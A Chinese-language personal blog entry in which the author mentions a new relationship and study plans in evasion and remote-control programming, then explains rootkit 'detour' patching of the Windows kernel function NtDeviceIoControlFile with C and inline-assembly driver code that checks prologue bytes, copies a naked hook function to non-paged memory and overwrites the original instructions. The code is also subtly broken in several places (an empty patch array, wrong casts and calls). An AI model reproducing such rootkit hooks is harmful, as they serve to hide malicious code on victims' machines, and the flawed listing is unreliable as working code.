好长时间没记录点东西了 重要的事说三遍 脱单了 脱单了 脱单了 女票当然是追了将近两年的女神。虽然有些意外 到现在还不知道她想法 总之怎么说,认真去对待,我想走到最后。
之前由于有些兴奋,荒废了一些专业上的东西,学期接近尾声,最大的收获也算是Rootkit吧,接下来不管去不去宁 寒假都要学的 免杀,windows编程(远控),下学期逆向、linux。
今天看了Rootkit打补丁的两种方式,1、detour补丁 2、jumptemplate补丁
detour补丁有点类似于inlineHook(说实在的真没看出来二者区别)即当系统在调用一些函数时,将函数的开头指令部分修改为无条件跳转指令,JMP,从而在函数运行时跳转到事先编号的Rootkit函数并在Rootkit函数中实现原函数被修改的指令功能最后在跳回到原函数中运行。
实现detour补丁,首先需要判断修改的函数是否是你预想的那个系统版本,(如果修改的字节数造成原函数存在截断指令,系统将无法识别剩下的截断指令,从而造成系统蓝屏)即通过对比函数需要修改的几个指令,是否和自己预先调试的一样,如果出现截断指令需用nop将其填充。
如 NTSTATUS CheckFuctionBytesNtDeviceIoControlFile()
{
int i=0;
char *p=(char *)NtDeviceIoControlFile;
char c[]={0x55,0x8B,0xEC,0x6A,0x01,0xFF,0x75,0x2c};
while(i<8)
{
if(p[i]==c[i])
{
i++;
}
else
return STATUS_UNSUCCESSFUL;
}
return STATUS_SUCCESS;
}
之后编写Rootkit函数,该函数被声明为naked属性,为了防止系统在其运行时插入其他代码。
__declspec(naked) my_function_detour_ntdeviceIoControl()
{
//rootkit 代码
__asm
{
push ebp
mov ebp,esp
push 0x01
push dword ptr [ebp+0x2c]
//jmp to the rootkit code
_emit 0xEA
_emit 0xAA
_emit 0xAA
_emit 0xAA
_emit 0xAA
_emit 0x08
_emit 0x00
}
}
运行时修改地址
VOID DetourFunctionNtDeviceIoControlFile()
{
char *actualfunction=(char *)NtDeviceIoControlFile();
char *non_paged_memory;
unsigned long detour_address;
unsigned long reentry_address;
int i=0;
char newCode[]={};
reentry_address=((unsigned long )NtDeviceIoControlFile)+8;
non_paged_memory=ExAllocatePool(NonPagedPool,256);
for(i=0;i<256;i++)
{
((unsigned char*)non_paged_memory[i])=((unsigned char*)my_function_detour_ntdeviceIoControl)[i];
}
detour_address=(unsigned long )non_paged_memory;
*( (unsigned long *) (& newCode[1]))=detour_address;
for(i=0;i<256;i++)
{
if((unsigned char*)non_paged_memory[i]==0xAA&&(unsigned char*)non_paged_memory[i+1]==0xAA&&(unsigned char*)non_paged_memory[i+2]==0xAA&&(unsigned char*)non_paged_memory[i+3]==0xAA)
{
*((unsigned char*)non_paged_memory[i])=reentry_address;
break;
}
}
for(i=0;i<9;i++)
{
actualfunction[i]=newCode[i];
}
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriver,IN PUNICODE_STRING pRegistryPath)
{
if(NT_SUCCESS!=CheckFuctionBytesNtDeviceIoControlFile())
{
DbgPrint("unmatched function");
return STATUS_UNSUCCESSFUL;
}
DetourFunctionNtDeviceIoControlFile();
return STATUS_SUCCESS;
}